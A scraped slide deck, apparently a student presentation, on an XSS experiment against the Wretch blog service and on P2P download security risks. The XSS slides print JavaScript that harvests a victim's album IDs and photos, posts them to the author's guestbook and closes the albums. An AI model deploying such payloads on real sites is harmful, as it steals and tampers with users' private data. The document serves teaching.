一、 XSS 實做經驗 – 無 x 小站 二、 P2P 下載軟體之安全疑慮

Slides:



Advertisements
Similar presentations
第八章 土地行政管理.
Advertisements

第14章 表单 在制作动态网页时,要实现信息交互,常常用到表单。 常见的表单有搜索表单、用户登录注册表单、调查表 单、留言簿表单等。本章节将和大家一起探讨在表单 的基本概念和各个元素,以及在Dreamweaver CS4中 如何创建表单,并通过实例掌握表单制作的方法。
「互联网金融2.0时代」与房地产的融合 广州互联网金融协会会长、广州e贷总裁 方颂.
企业会计学(三) 人大版本 吕 昌.
據點考核與評鑑 報告人:臺南市政府 照顧服務管理中心.
特殊族群運動健康訓練(I).
依据教材 全国高等教育自学考试指定教材 《西方行政学说史》, 竺乾威主编,高等教育出版社。
正 信 讀 書 會 主 持 群 : 姚 永 錩 、 鄭 健 、 陳 淑 珍 佛法的生活應用 2008/07/23.
非法集资典型案例评析 南京师范大学法学院 蔡道通 2016年1月.
专题(二) 交往沟通 掌握技能 命 题 解 读 背 景 材 料 新 题 演 练 考 点 链 接 1.
姓名:劉芷瑄 班級:J201 座號:39號 ISBN:957-33-1963-2
松竹梅岁寒三友 步入建交 桃李杏村暖一家 迈进职教 活出精彩.
情緒與壓力管理─背部舒緩 指導老師:彭易璟 第六組組員:會資三乙 499A0047 謝宛霖 會資三乙 499A0019 吳汶諭
第六章 展開審計工作.
第八单元第二课第一课时 严守法律 温州四中 蒋莉青.
指導老師:楊淑娥 組別:第一組 成員:劉怡萱4a0i0066 吳珮瑜4a0i0070 林秋如4a0i0075 陳婉婷4a0i0076
組員:4A140013張瓊云 4A1I0039石宜芬 4A1I0909許峻綱 指導老師:王立杰老師
高级财务会计.
默写基础知识: 1、家庭是由 关系、 关系或 关系而结合成的亲属生活组织。家里有 ,家中有 。
什么是颈椎病? 颈椎病是指颈椎间盘退行性变,及其继发性椎间关节退行性变所致脊髓、神经、血管损害而表现的相应症状和体征。
社会主义改革开放理论 坚定不移推进改革 ——全面深化改革.
全球暖化 想知道全球暖化的嚴重性嗎? 那就繼續看下去吧!! 組員:陳儀君60524 蘇鈺祺60526 于玉琳60528 林宥嫻60521.
提升機密文書處理能力以貫徹執行個人資料保護 臺北市政府政風處 股長 呂佩毓
第三章 使用XMLHttpRequest对象
鸿门宴 司马迁.
第一单元 中国传统文化主流思想的演变.
公務人員退休法、撫卹法 法制與實務講習 銓敘部退撫司 中華民國99年8月.
《傅雷家书》 学 科:语文 年 级:九年级 授课教师:王宁宁.
第一節 行政裁量與不確定法律概念 第二節 行政裁量
指導老師:陳韻如 班級:幼保二甲 姓名:林靜宜 學號:4A0I0033
本课设置5个环节 一、限时秒杀--5分钟 二、摩拳擦掌--9分钟 三、刀锋相见--20分钟 四、现炒现卖--5分钟 五、相约课后--1分钟.
从中国与联合国的关系演进 看联合国的产生与发展
网络协会2017培训 恶补Web知识训练营 2017/4/7 – Payne.
第一篇 Unix/Linux 操作介面 第 1 章 Unix/Linux 系統概論 第 2 章 開始使用 Unix/Linux
客戶端的檔案上傳 HtmlInputFile檔案控制項 上傳單一檔案 同時上傳多個檔案.
應用軟體 本節重點: 應用軟體簡介 Word Excel PowerPoint 資料庫Acess.
HiNet 光世代非固定制 用戶端IPv6設定方式說明
SSL-VPN 之登入及使用 資訊處 主講人.
電子郵件 人際溝通 2018/12/27 輔仁大學圖書資訊學系.
Echo Server/Client Speaker:Fang.
Web Crack 专题 – AJAX – 2016/11/18 – Payne 本次培训仅供教学内部用途 实验请遵守相关法律法规
FTP檔案上傳下載 實務與運用.
產品語意 班級:夜四技產設三甲 學生:鄭舜鴻 學號:9A01C023 指導教師:唐蔚.
PowerCam快速數位教材製作 黃雲龍 NCCU/ NTSU.
網路安全技術 OSI七層 學生:A 郭瀝婷 指導教授:梁明章.
網頁程式概論 建國科技大學資管系 饒瑞佶 2015/9 V1 2016/4 V2 2016/9 V3.
講師:陳永芳 網際網路資源運用 講師:陳永芳
資料來源 2 網路過濾軟體之安裝說明 資料來源 2.
表格(HTML – FORM).
WinPXE 無硬碟系統 6.0 安裝說明 憶傑科技股份有限公司
緩衝區溢位攻擊 學生:A 羅以豪 教授:梁明章
單元三 資訊安全與保護 Learning Lab.
網際網路與電腦應用 林偉川 2001/10/18.
FTP使用教學 簡介: 軟體名稱:FileZilla 軟體性質:Freeware 版本: 繁體中文版
网 站 设 计 与 建 设 Website design and developments
取得與安裝TIDE 從TIBBO網站取得TIDE
業務員 傷害險通報作業 新光人壽內網-產險傷害險通報P2~P4 【個人】傷害險通報作業P5~P10 【團體】傷害險通報作業P11~P16
加減法文字題 國小低年級學生對加減法文字題的瞭解 小組成員 陳育娟 羅珠綾 侯宜孜
飛行器製作與飛行 講師:劉修建.
如何從政大圖書館館藏目錄匯出書目至EndNote
第四章 通訊與網路管理 授課老師:褚麗絹.
因果性:一个形而上学的预设 赵敦华 2008年5月.
網路安全管理個人報告 封包偽裝攻擊 A 魏兆言 2007/11/30.
手机淘宝“变形”产品—微淘 操作流程指南 (内测版).
多站台網路預約系統之 AJAX即時資料更新機制
臺中市龍山國小 校園常見瓢蟲辨識   瓢蟲屬於鞘翅目瓢蟲科。目前世界上約有5000多種瓢蟲,台灣地區約有80種以上,其中能捕食有害生物的瓢蟲約七十種之多。瓢蟲因為捕食有害生物為主食,所以又稱為『活農藥』。
NFC (近場通訊, Near Field Communication) 靜宜大學資管系 楊子青
Chapter 4 Multi-Threads (多執行緒).
雲端電腦教室 Matlab 使用介紹 1. 工作目錄切換 2. 把 matlab 的檔案存出來 3. Matlab 軟體介面.
Presentation transcript:

一、 XSS 實做經驗 – 無 x 小站 二、 P2P 下載軟體之安全疑慮 國立高雄大學 資訊管理學系 A0933355 洪忠福

一、 XSS 實做經驗 – x 名小站

嵌入 Javascript

alert ( document.cookie); 測試 Javascript alert ( document.cookie);

嵌入之前的正常網頁

嵌入之後的網頁

執行ajax動作(取得所有相簿ID):

執行ajax動作(取得所有相簿第一張照片):

執行ajax動作(將資訊紀錄在留言板):

執行ajax動作(將資訊紀錄在留言板):

將相簿關閉:

分析 GET 與 POST:

分析 GET 與 POST:

brequest.onreadystatechange = parseBook; 部份程式碼 ( 取得相簿id ): brequest.onreadystatechange = parseBook; brequest.open('GET','http://www.wretch.cc/album/modify.php?admin_home=1',false); var all = brequest.responseText; var reg = /option value=\"\d+?\">/ig; if (all!=null) a = all.match(reg); if (a == null) return; var alen = a.length; for (var i= 0; i<alen;i++){ a[i] = a[i].replace(/option value=|[>\"]/g,"") }

部份程式碼 (發送xmlHttpRequest): var fstr = "%E7%B7%A8%E8%BC%AF%E7%9B%B8%E7%B0%BF"; var sendStr = "cid=0&page=0&.c=UyofthX32jh&.t=1196105110"; sendStr += “&func_mod=”+fstr + bstr; request.onreadystatechange = ready; request.open('POST','http://www.wretch.cc/album/func_home.php', false); request.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); request.send(sendStr);

for (var i=0;i<len;i++){ str += all[i] +"%0D%0A"; } 部份程式碼 (留言): var str = ""; for (var i=0;i<len;i++){ str += all[i] +"%0D%0A"; } var sendstr = “.c=FKIBhhC9SN4&.t=1196398126&userid=MyID"; sendstr += “&used_name=sess_name&sess_name=MyID"; sendstr += "&email=&url=&rem=true&isCloak=true&title=Test&content=" + str; sendstr += "&leavemsg=%E7%95%99%E8%A8%80"; srequest.onreadystatechange = lastP; srequest.open('POST','http://www.wretch.cc/guestbook/func_guestbook.php',true); srequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); srequest.send(sendstr);

二、 P2P 下載軟體之安全疑慮

P2P 下載軟體簡介 Peer to Peer:點對點通訊傳輸工具 檔案傳送採取用戶與用戶的通訊模式,傳送檔案的時候,可以同時連接多個下載點,分散式下載檔案 快速完成檔案下載的目標 最普遍廣泛的用途:「盜版物交流」 常見的有:Foxy, eDonkey, BT 等

P2P 可能影響網安的問題 1. 使用者門戶大開 2. 佔用頻寬、癱瘓網路 3. 硬體設備損害

1. 使用者門戶大開 沒有開啟或安裝防毒軟體、防火牆 抓到假檔、惡意程式 將重要目錄開放分享 電腦遭受攻擊 植入病毒、木馬 洩漏系統檔案 個人資料 各種帳號密碼

實例:

2. 佔用頻寬、癱瘓網路 P2P 下載軟體的分享制度 上傳與下載的限制 最恐怖的軟體:Foxy 影響人際關係 搜尋時暴力的發出 request 無法調整上傳下載限制 影響人際關係

3. 硬體設備損害 處理軟體發出的 request 硬碟的讀寫頻繁 不連續的儲存空間,影響讀取與寫入的動作 改善:系統重整、預先配置硬碟

佔用 CPU :

The End